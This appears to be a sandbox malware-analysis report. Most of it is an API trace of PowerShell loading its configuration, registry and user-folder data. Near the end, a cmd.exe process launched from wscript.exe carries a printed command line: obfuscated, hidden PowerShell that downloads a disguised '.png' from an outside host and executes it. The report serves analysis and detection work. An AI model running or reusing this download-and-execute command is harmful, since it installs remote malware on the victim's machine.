File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn

Thread 0xce8

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #43: cmd.exe

50

0

»

Information	Value
ID	#43
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:02, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:23

OS Process Information

»

Information	Value
PID	0xc6c
Parent PID	0x71c (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C70

Threads

Thread 0xc70

50

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:06 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 193753	1	Fn
System	Get Time	type = Performance Ctr, time = 24832027162	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
